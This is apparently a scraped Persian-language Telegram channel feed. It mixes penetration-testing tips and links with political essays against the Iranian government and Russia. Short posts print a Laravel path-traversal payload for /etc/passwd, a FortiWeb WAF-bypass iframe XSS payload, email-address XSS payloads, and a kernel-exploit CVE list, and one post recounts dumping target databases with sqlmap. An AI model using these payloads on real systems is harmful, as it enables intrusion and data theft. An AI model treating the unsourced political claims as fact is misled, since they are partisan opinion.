بیایید حفاظت CSRF و تأیید رمز عبور را برای تصاحب حساب‌های قربانی دور(bypass) بزنیم

https://medium.com/@hbothra22/lets-bypass-csrf-protection-password-confirmation-to-takeover-victim-accounts-d-4a21297847ff

#csrf
@pfksecurity

‏«در بلایای طبیعی هیچ چیز طبیعی‌ای وجود ندارد.» دیوید هاروی،جغرافی‌دان

زلزله‌ای که در ژاپن مرگبار نیست در ایران یا ترکیه به فاجعه می‌انجامد زیرا در خاورمیانۀ آکنده از تبعیض،امنیت امری صرفاً نظامی تلقی می‌شود و ابعاد اجتماعی و اقتصادی آن،و از همه مهم‌تر،«کرامت» آدمی نادیده می‌ماند

@PfkSecurity

Race Conditions - Exploring the Possibilities

https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html
#web #RaceCondition
@pfksecurity

موضوع اصلی مباحث تخصصی در مورد تست نفوذ هست ولی برای بحث های دیگه باید بگم ، تمام عقاید قابل نقد و بحث هستند و آزادی بیان(بدون فحاشی و محترمانه) مبنای مباحثه است.

لینک گروه :

https://t.iss.one/+114BerAH5lo1ODM0

اعضای تیم ما در حالی که به دنبال آسیب‌پذیری‌های وب بودند، بسیاری از تزریق‌های SQL را از محدوده تارگت پیدا کردند. من شروع به جمع‌آوری دامنه‌ها کردم و به‌طور دستی آسیب‌پذیری را برای یافتن اینکه سرور از چه پایگاه‌داده‌ای استفاده می‌کند.

وقتی صحبت از SQL Injection می شود، من همیشه از برگه تقلب تزریق SQL Portswigger برای مرجع استفاده می کنم.
در حین بررسی آن سایت ها، یک چیز مشترک را پیدا کردم که همه آنها به اشتراک گذاشته بودند. برخی از گروه‌های خاصی از سایت‌ها از همان پشته فناوری برای برنامه‌های کاربردی وب خود استفاده می‌کردند. آنها از دات نت برای قسمت جلویی، سرور IIS برای میزبانی و MSSQL (به صورت دستی) برای قسمت پشتی استفاده می کردند.
# Typical Enterprise Web Application Stack Front End (.NET) <---> Server (IIS) <---> Back End (MSSQL)
جدای از اینها، آنها از برنامه ها و برنامه های وردپرس با PHP + MySQL استفاده کرده اند که رفتاری مشابه وردپرس دارد اما وردپرس نیست.
من از sqlmap برای حذف کل DB از پایگاه داده MySQL استفاده کردم، و سایت های دیگر (از جمله MSSQL، جایی که یک DB مشترک با بسیاری از برنامه های کاربردی وب همگام سازی شده بودند) Blind SQLi داشتند که زمان بیشتری برای bruteforce و تخلیه داده ها می برد. حذف نام پایگاه داده و نام جدول به تنهایی به من درک خوبی از دامنه های داخلی و برنامه های وب داخلی آنها داد.


ادامه دارد ....
@pfksecurity

هرگز تماشاچی بی عدالتی یا رفتار احمقانه نباشید. قبر زمان زیادی را برای سکوت فراهم می کند.

کریستوفر هیچنز

@pfksecurity

AMSI Bypass New Way 2023.

https://infosecwriteups.com/amsi-bypass-new-way-2023-d506345944e9

#AMSI
@PfkSecurity

🌐 افزایش نرخ دلار به نفع حکومت اسلامی و به ضرر جریان براندازی!


🔻اگر از منظر جامعه شناسی به ماهیت براندازی بنگریم متوجه میشویم که از نظر «اقتصادی» سه طیف در این جریان درگیر هستند:
۱. قشر مرفه
۲.قشر متوسط
۳.قشر ضعیف

قاعدتاً قشر مرفه به واسطه رانت و مافیای نظام به سطح بالایی از رفاه رسیده اند و منافعشان با رژیم گره خورده و اصولاً مخالف براندازی هستند.

قشر متوسط بواسطه آگاهی از رانت های موجود و تشخیص جرم ها و جنایات حکومت، تحت فشار هستند و خواهان براندازی اند.

قشر ضعیف جامعه بدلیل کمبود حداقل های زندگی و نبود فرصت کافی برای مطالعه و شناخت جریانات حاکم بر جامعه و جایگزین کردن مذهب بجای مطالعه به رشد و آگاهی کامل نرسیده اند.

بر این اساس شاهد سوءاستفاده قشر مرفه از عدم آگاهی قشر ضعیف و با صرف درصد کمی از چپاول ثروت عمومی جامعه (به کمک ابزار دین) به برخی از افراد قشر ضعیف، درصدد کنترل قشر متوسط و آگاه جامعه بر می آیند، بدین سبب قشر ضعیف با سرکوب قشر متوسط به حداقل های زندگی رسیده و از نظر مذهبی نیز به جایگاه ذهنی خود خواهد رسید.

این کلّیت وضعیت موجود در جامعه از منظر اقتصادی در جریان براندازی است، حال حکومت با افزایش نرخ ارز به دو هدف می‌رسد :
۱- افزایش درآمد از جیب مردم و جُبران کسر بودجه
۲- فشار بیشتر بر قشر متوسط و ضعیف جامعه برای کنترل جریان براندازی

برای مثال در شهر تهران مناطقی که قشر متوسط جامعه ساکن آن بودند مثل : اکباتان، پونک، شهرزیبا،تهرانپارس،نارمک،.. شاهد بیشترین اعتراضات بودیم، در مقابل مناطقی که اقشار ضعیف و اقشار مرفه جامعه ساکن آن بودند، اعتراض ملموسی مشاهده نشد.

حکومت اسلامی برای از بین بردن اعتراضات و جریان براندازی، به دنبال ضعیف کردن و حذف قشر متوسط جامعه است و تمام قوایش را در این راه بسیج کرده است.


@pfksecurity

🌐 روسیه استعمار گر و سران جنایتکارشان را بیشتر بشناسید!


🔻قابل توجه مأمورین نفوذی پوتین و روس پرستان بیسواد که امروز مصدر بسیاری مراکز مهم تصمیم گیری هستند... ؟ !

نخست این را از قول فریدون آدمیت در کتاب 
« اندیشه ترقی و حکومت قانون» بگویيم که : 

(روس دشمن مطلق ایران بود . دشمن استقلال و آزادی و ترقی و تمامیت ارضی ما بود .ما را ناتوان و عقب مانده میخواست تا سیاست های تجاوزکارانه نظامی و استعماری خود را پیش ببرد . با هر نقشه و اصلاح ‌تغییری در ایران سر ستیز داشت )

از یاد نبرید گفته امیر کبیر آن اصلاحاتگر بزرگ را که میگفت : خیال کنستیتوسیون (قانون اساسي ومشروطيت )داشتم  اما مانع بزرگ من روس ها بودند .

۱- طی عهد نامه گلستان  ، مجموعا دویست و بیست هزار کیلومتر مربع از چچن و اینگوش امروزی ، پنجاه هزار کیلومتر مربع از داغستان امروزی ، هشتاد هزار کیلومتر مربع از جمهوری آذربایجان امروزی ، ده هزار کیلومتر مربع از ارمنستان امروزی و شصت و هشت هزار کیلومتر مربع از گرجستان امروزی از پیکر ایران جدا شدند و ضمیمه خاک روسیه گردیدند.

۲-در عهد نامه ترکمنچای نیز در مجموع حدود سی هزار کیلومتر مربع شامل حدود بیست هزار کیلومتر مربع از ارمنستان امروزی، پنجهزار کیلومتر مربع از ترکیه امروزی شامل کوههای آرارات و شهر ایغدیر که آنزمان بخشی از خانات ایروان بود و همچنین پنجهزار کیلومتر مربع از جمهوری آذربایجان امروزی از ایران جدا شدند. 

۳-روسیه در سال ۱۲۲۳ قمری به ایران حمله کرد . گرجستان و تالش و گنجه و شیروان و باکو را از پیکره ایران جدا کرد. 

۴-پس از عدم پذیرش درخواست روسیه از طرف مجلس شورایملی بسال ۱۲۹۰ خورشیدی مبنی بر اخراج مورگان شوستر ، به تبریز و رشت و انزلی حمله کرد و هزاران نفر را قتل عام کردو ‌قصد تسخیر قزوین و تهران را داشت.

۵-تا جنگ جهانی اول در تبریز ماند و بسیاری از آزادیخواهان و مشروطه طلبان از جمله ثقه الاسلام تبریزی و علی موسیو و فرزندان او را اعدام کرد.

۶-بسال ۱۹۰۷ میلادی شمال ایران رامنطقه نفوذ خود اعلام کرد.

۷- در شهریور۱۳۲۰ و بهنگام جنگ دوم جهانی خاک ایران را اشغال کرد و با حمایت از جدایی خواهان آذربایجان و کردستان و گیلان حکومت های دست نشانده تبریز و گیلان و مهاباد را بوجود آورد. 
۸- برای حمایت از نوکران خود تا مدتها پس از پایان جنگ جهانی دوم  از ایران خارج نشد و اگر فشار های امریکا و سیاست خردمندانه احمد قوام نبود بخش دیگری از سرزمین مان را می بلعید. 

۹- در سال ۱۲۹۱ خورشیدی مسجد گوهرشادو حرم امام رضا را به توپ بست و سربازان روس با ورود به حرم امام رضا اموال حرم را به غارت بردند.
۱۰-بسال ۱۲۹۹ هجری قمری عهد نامه ننگین « آخال » را بر ایران تحمیل کرد که بر اساس مفاد آن بخش های بزرگی از خاک شمال شرقی ایران در خراسان بزرگ از پیکر ایران جدا شد و ضمیمه خاک روسیه گردید.

۱۱- بسال ۱۲۷۱هجری قمری جنگی میان فریدون میرزا فرمانده ارتش ناصر الدین شاه و محمد امین خان حاکم خوارزم روی داد که به شکست و کشته شدن حاکم خوارزم منتهی شد اما دولت روسیه‌ با استقرار نیروهای قزاق خود در منطقه خوارزم همه متصرفات ایران در کنار رود جیحون را اشغال کرد و ضمیمه خاک روسیه کرد. 
همین قرار داد آخال که به ایران تحمیل شد هیچ از عهدنامه های ننگین گلستان و ترکمنچای کم نداشت و تمامیت ارضی میهن ما بار دیگر مورد تجاوز روس ها قرار گرفت.

۱۲-دشمنی روسیه با مشروطه و مشروطه خواهان و بمباران مجلس شورای ملی توسط شاپشال روسی و حمایت از تجزیه طلبان بخشی دیگر از اوراق تاریخ خونبار میهن ماست که نمیتوان هرگز آنرا به فراموشی سپرد.
اضافه کنید:
۱)راه اندازی حکومت کمونیستی ضد دین در جوار یک کشور مسلمان و تشکیل حزب توده و حزب کمونیست و نفوذ در همه ارکان ایران عزیز که تا به امروز نیز ادامه دارد
۲) راه اندازی جنگ و حمله ارتش صدام که هم خود وابسته به شوروی بود و هم تمام تسلیحاتی که موجب نابودی مردم و کشور ایران شد متعلق و ساخت شوروی بود( تانک تی هفتاد دو تا میگ و سوخو و خمپاره انداز و کلاش و موشکهایی که به شهرهای بی دفاع ما شلیک می شد)
۳) کودتای هاي ساختگی که موجب اعدام همه یا اکثر فرماندهان ماهر و و وطن پرست نطامی ایران گردید
۴) چهل سال معطلی برای ساخت نیروگاه بوشهر
۵) رای به تمام قطعنامه های سازمان ملل و شورای امنیت
۶) علی رغم ادعای رفاقت عدم استفاده از حق وتوی خود به نفع ایران حتی یکبار
۷) رعایت تمام تحریمها
۸) خیانت در سوریه و عراق و …..

خيانتي كه روسيه درطول تاريخ به مردم ایران كرده قابل قياس باهيچ كشوري نيست !

✍دکتر تقی کیمیایی اسدی


@pfksecurity

🌐 داستان توافق ایران و عربستان با دستور چین


1. از چند ماه قبل چین تصمیم گرفت که یک تلنگر جدی به رهبری ایران بدهد تا از خواب و خیال بیدار شوند و پایبند به روابط بین المللی شوند و محل تامین انرژی چین یعنی خلیج فارس را محل خطر و جنگ  قومی، قبیله ای نکنند.
2. رئیس جمهور چین به عربستان می رود قراردادهای استراتژیک و حیاتی با عربستان می بندد و برای آنکه آنها را خوشحال کند، اعلام می کند که ایران در کشورهای منطقه دخالت نکند، جنگ افروزی نکند، 3 جزیره را نیز بیاید مسئله اش را با اعراب حل کند.
3. جمهوری اسلامیِ عصبانی دید پشتش خالی شد به چین پیام می دهد پس پیمان شانگهای، قرارداد 25 ساله چه شد؟
4. چین در پاسخ به ایران تفهیم می کند اینها مقدمات همان قراردادها است و وزیر خارجه خود را سریع به ایران می فرست تا دلجویی کند و از رئیسی دعوت کند بیاید چین تا او را در مورد تحولات بین المللی که قرار است اتفاق  بیافتد توجیه کند.
5. در سفر رئیسی تذکرات جدی به رهبری داده می شود که قرار است آمریکا و اروپا در شورای حکام یک قطعنامه قوی بر علیه غنی سازی 60 درصدی اورانیم و عدم تمکین ایران از تعهدات نسبت به آژانس بین المللی انرژی اتمی، صادر کند. در چنین صورت و در ادامه پرونده ایران را به شورای امنیت می برد و. ...
6. چین به رئیسی می فهماند که قضیه جدی است و برود و آقای خامنه ای را در جریان آنچه قطعناً بر سر ایران خواهد آمد بگذارد. اگر دست از غنی سازی بر ندارد، روی حمایت چین حساب نکند. در ضمن چین به رهبری اجازه نخواهد داد که ایران با جنگ با عربستان و یا حمله به مراکز تامین انرژی چین در خلیج فارس هیچ کاری را بکند و به شدت جلوی آن کار را خواهد گرفت زیرا به حیات چین و برنامه های توسعه ای چین لطمه جدی خواهد خورد.
6. در ضمن به رئیسی گفتند سریع با آژانس انرژی اتمی مسائل تان را حل کنید و چین نیز زمینه صلح و دوستی بین ایران و عربستان و سپس ایران با جهان اعراب را  تامین وتضمین می کند.
7. رهبری سریع دستور داد از گروسی دعوت کنید و امتیاز بدهید و بدون درخواست از رفع تحریم از غرب و آمریکا و گذاشتن شرط برای این کار، از شرط و شروط گذشت و گروسی به ایران آمد و اینها نیز با او به توافق رسیدند. البته شرط گروسی به آمدن به ایران دیدار با رئیسی رئیس جمهور برای گرفتن تعهد در اجرای تفاهمنامه بود تا بعداً ایران زیر قول و قرار نزند و او بتواند در گزارش رسمی به آژانس انرژی اتمی و متقاعد کردن آنها در جلوگیری از صدور قطعنامه بر علیه ایران تلاش کند.
8. آمریکا و اروپا از صدور قطعنامه بر علیه ایران در جلسه دو روز گذشته شورای حکام صرف نظر کردند. آمریکا مدعی شد منتظر اجرای عملی و سریع و قولی که ایران داده است می ماند تا متقاعد شود و دو باره ایران بازی در نیاورد.
9. همچنین خبرهایی می رسد که ایران قصد دارد زندانیان آمریکایی و سایر کشورهای اروپایی را آزاد کند.
10. پس از این نرمش قهرمانانه، جمهوری اسلامی ایران و چین در نشست هفته گذشته در سازمان ملل متحد در مورد حمله روسیه به اکراین رای ممتنع می دهند. و سپس رهبری بعنوان فرمانده کل قوا تصمیم می گیرند که هیچ موشک بالستیک برای حمایت از روسیه به جنگ در اکراین ارسال نکنند. همچنین انگلستان رسما اعلام می کند که هیچ پهباد ایرانی پس از 4 فوریه به بعد در جنگ اکراین شرکت نداشته است.
11. یعنی ایران دو تصمیم عاقلانه و همزمان گرفت :
الف) دست از حمایت روسیه در جنگ با اکراین برداشت.
ب) دست از لج بازی در غنی سازی اورانیم کشید و به انجام تعهدات خود به آژانس انرژی اتمی بدون گذاشتن هیچ شرطی برگشت.
12. یعنی جمهوری اسلامی وقتی خطر جدی و زور پر زور را بفهمد حاضر است نرمش قهرمانانه کند و حتی با وهابی های تند رو ضد شیعه نیز می توان به تفاهم رسید، همانطور که با طالبان و القاعده می توان همکاری نمود.
13. چین کمونیست برای حفظ منافع ملی کشورش عمل کرد و هیچگاه  عاشق دو کشور تند رو مذهبی، اسلامی و قبیله ای نظیر عربستان وهابی و جمهوری اسلامی شیعی تندرو نیست. ولی برای حفظ جریان نفت و انرژی از خلیج فارس این دو دشمن را می خواهد در زیر لوای خویش به دو تا دوست با هم و البته مشترک با چین ابرقدرت تبدیل کند.
در مجموع کار بسیار خوبی انجام داد و جلوی یک جنگ و خونریزی دیگر در منطقه را که از طرف دشمنان و بخصوص اسرائیل ترویج می شد را گرفت
14. بصیرت اقتضا می کرد که از سال ها قبل به نصایح صالحان و دلسوزان جمهوری اسلامی گوش می دادند و فرصت سوزی نمی کردند و در زمان های مناسب قبلی با گرفتن امتیازات خوب به نفع مردم ایران عمل می کردند و شرایط کشور را به حالت بحران و سقوط نمی بردند تا مجبور نمی شدند که نرمش قهرمانانه کنند. در هر صورت خدا کند به این تفاهمات پایبند باشند و نفعی نیز به مردم ایران برسد و خدعه ای در کار نباشد.

✍ دکتر تقی کیمیایی اسدی

@pfksecurity

افزایش دسترسی در ویندوز 7/8/10 از طریق Atom Table Hijacking

https://github.com/SleepTheGod/Windows-Atom-Table-Hijacking
#PrivEsc
@pfksecurity

فریم ورک لاروال

Payload: //////////////////../../../../../../../../etc/passwd

#laravel
@pfksecurity

با درود خدمت هم میهنان عزیزم - آغاز سال نو ۲۵۸۲ شاهنشاهی

فرا رسیدن نوروز باستانی را به شما شاد باش می گویم !


سال گذشته، سالی بود که مردم ایران با تلاشی بی‌وقفه، برای تحقق آرمان هایشان به دنبال آزادی  در مقابل یک رژیم ستمگر و جنایتکار مبارزه کردند. در این سال، با حضور شجاع و پرافتخار زنان ایران، حماسه ای بزرگ به نام زن، به نام زندگی و به نام آزادی، شکل گرفت و مردم ایران توانستند با پایداری و استقامت خود، برای تحقق این آرمان ها به مبارزه بپردازند.

شما به دنبال رهایی میهن‌تان از دست رژیم ظالمانه‌ای هستید که مردم را به فقر و بی‌عدالتی محکوم می‌کند. این راه نیز پر از مخاطرات و تلاش‌های فراوانی است، اما شما با ثابت قدمی و انگیزه‌ی بالا، به هدف نهایی خود نزدیک خواهیم شد.

فراموش نکنید که یاد جانباختگان میهن، تابناکترین چراغ برای ماست. آنها همیشه در قلب و خاطر ما هستند و باعث ایجاد انگیزه و شور در ما می‌شوند. در این سال جدید، بار دیگر از شما می‌خواهیم که پشتیبان خانواده‌هایی باشید که عزیزان خود را از دست داده‌اند.

با آرزوی بهترین ها برای همگان، برای ایران و مردمش، این سال را با امید به آینده به دست خواهیم آورد و با همبستگی و وحدت، به دنبال نابودی رژیم ضحاک خواهیم رفت.

- کاوه
پاینده باشید!
نوروزتان شاد .
@PfkSecurity

🎁 عیدی ما به شما

آماده سازی OSWE/AWAE

این پست شامل تمام آموزش ها و آموزش هایی است که می تواند برای گواهینامه OSWE امنیت تهاجمی مفید باشد.

Course Syllabus:
https://www.offensive-security.com/documentation/awae-syllabus.pdf


به زودی در کانال قرار میگیرد این پست منتظر باشید ...
#web
#exploitdev
#OSWE
@pfksecurity

بای پس برای FortiWeb (Fortinet) WAF
استفاده:
"><iframe src=//14.rs>
یعنی به جای بارگذاری استاندارد XSS برای اجرای js
#waf #Bypass
@Pfksecurity

kernel-linux-factory

راحت است زیرا نیازی به کامپایل یا تنظیم محیط ندارید، من به این نگاه کردم که کدام کرنل، یک splot راه اندازی کرد.

به عنوان بخشی از اکسپلویت برای:

CVE-2016-9793
4-20-BPF-integer
CVE-2017-5123
CVE-2017-6074
CVE-2017-7308
CVE-2017-8890
CVE-2017-11176
CVE-2017-16995
CVE-2017-1000112
CVE-2018-5333
CVE-2019-9213 & CVE-2019-8956
CVE-2019-15666
CVE-2020-8835
CVE-2020-27194
CVE-2021-3156
CVE-2021-31440
CVE-2021-3490
CVE-2021-22555
CVE-2021-41073
CVE-2021-4154
CVE-2021-42008
CVE-2021-43267
CVE-2022-0185
CVE-2022-0847
CVE-2022-0995
CVE-2022-1015
CVE-2022-2588
CVE-2022-2639
CVE-2022-25636
CVE-2022-27666
CVE-2022-32250
CVE-2022-34918

download

#linux
#exploits
#kernel
@PfkSecurity

درباره Payloads در ایمیل

موضوع جدید نیست، اما همچنان مرتبط است. یکی از محبوب ترین آسیب پذیری های آدرس ایمیل، به نظر من، XSS است. طبق RFC822، پیلود را می توان به این صورت وارد کرد:

"payload"@domain.com
name@"payload"domain.com
name(payload)@domain.com
name@(payload)domain.com
[email protected](payload)
…

در اینجا می توانید بررسی کنید که آیا ایمیل شما درست است یا خیر. علاوه بر XSS، می توانید به دنبال آسیب پذیری های دیگری مانند SQLi، SSTI، RCE نیز باشید. من در اینجا با جزئیات بیشتری در مورد این صحبت کردم.

ممکن است این سوال پیش بیاید، اما چگونه می توان از سایت به چنین آدرسی ثبت نام کرد و پیام دریافت کرد؟ می‌توانید سرور ایمیل خود را راه‌اندازی کنید یا آن را آسان‌تر انجام دهید و از Burp Collaborator استفاده کنید. همه ایمیل‌های زیر معتبر هستند و به Burp Collab شما پیام ارسال می‌کنند (به جای xxxx.oastify.com با ایمیل شما):

[email protected]

mail(<script>alert(0)</script>)@xxxx.oastify.com

"<img/src/onerror=alert(0)>"@xxxx.oastify.com

#web
#xss
#rce
#sqli
#ssti
@PfkSecurity